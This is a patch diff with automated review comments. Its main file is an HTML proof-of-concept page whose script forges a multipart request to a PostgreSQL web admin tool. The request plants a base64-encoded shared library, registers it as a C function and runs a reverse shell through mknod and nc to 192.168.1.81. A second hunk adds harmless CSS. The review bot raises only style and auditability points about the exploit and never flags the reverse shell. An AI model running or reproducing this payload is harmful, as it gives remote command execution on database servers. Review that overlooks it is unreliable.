AAAAAAAAgAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAANQAAAABAAAAAwAAAAAAAAAAECAAAAAAAAAQAAAAAAAAIA AAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADdAAAAAQAAAAMAAAAAAAAAIBAgAAAAAAAgEAAAAAAAAAgAAAAAAAAAA AAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA4wAAAAgAAAADAAAAAAAAACgQIAAAAAAAKBAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA AQAAAAAAAAAAAAAAAAAAAOgAAAABAAAAMAAAAAAAAAAAAAAAAAAAACgQAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA AAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAABQEAAAAAAAAFgFAAAAAAAAGgAAACwAAAAIAAAAAAAAABgAAAAAAA AACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAqBUAAAAAAADUAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABEAAAADA AAAAAAAAAAAAAAAAAAAAAAAAHwXAAAAAAAA8QAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA=\', \'base64\'));\r\n" +
|
|
+ "SELECT lo_export(43213, \'/tmp/pg_exec.so\');\r\n" +
|
|
+ "CREATE FUNCTION sys(cstring) RETURNS int AS \'/tmp/pg_exec.so\', \'pg_exec\' LANGUAGE \'c\' STRICT;\r\n" +
|
|
+ "SELECT sys(\'mknod /tmp/backpipe p\');\r\n" +
|
|
+ "SELECT sys(\'/bin/sh 0\x3c/tmp/backpipe | nc 192.168.1.81 80 1\x3e/tmp/backpipe\');\r\n" +
|
|
+ "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "2097152\r\n" +
|
|
+ "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"script\"; filename=\"\"\r\n" +
|
|
+ "Content-Type: application/octet-stream\r\n" +
|
|
+ "\r\n" +
|
|
+ "\r\n" +
|
|
+ "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"execute\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "Execute\r\n" +
|
|
+ "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"server\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "localhost:5432:allow\r\n" +
|
|
+ "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"database\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "postgres\r\n" +
|
|
+ "-----------------------------297112967428312--\r\n";
|
|
+ var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++)
|
|
+ aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody]));
|
|
+ }
|
|
+</script>
|
|
+<form action="#">
|
|
+ <input type="button" value="Submit request" onclick="submitRequest();" />
|
|
+</form>
|
|
+</body>
|
|
+</html>
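Review bot: The `INSERT INTO pg_largeobject` lines embed a large base64-encoded binary that the script later writes out as `/tmp/pg_exec.so`, so the repository now carries an opaque compiled object that cannot be audited from the diff, and distribution tooling that scans sources for embedded binaries will flag it. Prefer keeping the C source of that module next to the test with build instructions, or at minimum document in the README what the blob is and how it was produced. As a point of style, `var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++)` and the following line each hold two statements; poc1.html writes the same loop one statement per line, and this file should match it.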
|
|
Index: themes/global.css
|
|
===================================================================
|
|
--- themes/global.css.orig
|
|
+++ themes/global.css
|
|
@@ -92,6 +92,26 @@ body.browser {
|
|
color: #9F6000;
|
|
}
|
|
|
|
+/** alert banner **/
|
|
+.alert-banner {
|
|
+ background-color: #FEEFB3;
|
|
+ border: 1px dotted #9F6000;
|
|
+ color: #9F6000;
|
|
+ padding: 4px;
|
|
+ margin: 4px 0;
|
|
+}
|
|
+.alert-banner p {
|
|
+ margin: 0;
|
|
+ padding: 0;
|
|
+}
|
|
+.alert-banner p:before {
|
|
+ content: url(../../images/themes/default/ObjectNotFound.png);
|
|
+ vertical-align: -20%;
|
|
+}
|
|
+.alert-banner p a {
|
|
+ color: #9F6000;
|
|
+}
|
|
+
|
|
/** bottom link back to top **/
|
|
.bottom_link {
|
|
position: fixed;
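Review bot: `content: url(../../images/themes/default/ObjectNotFound.png)` in `.alert-banner p:before` resolves relative to the stylesheet's own location; with the stylesheet at the path shown in the header, `themes/global.css`, two parent steps land above the application root and the icon would fail to load unless the file is actually served from a deeper directory than the patch path suggests — worth checking against how the other image references in this file are written (none are visible in the hunk). The colour `#9F6000` now appears three times in the new rules plus once in the context above; a comment naming it as the shared warning colour, `/* warning text colour, keep in sync with the message rule above */`, would make that coupling explicit.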
|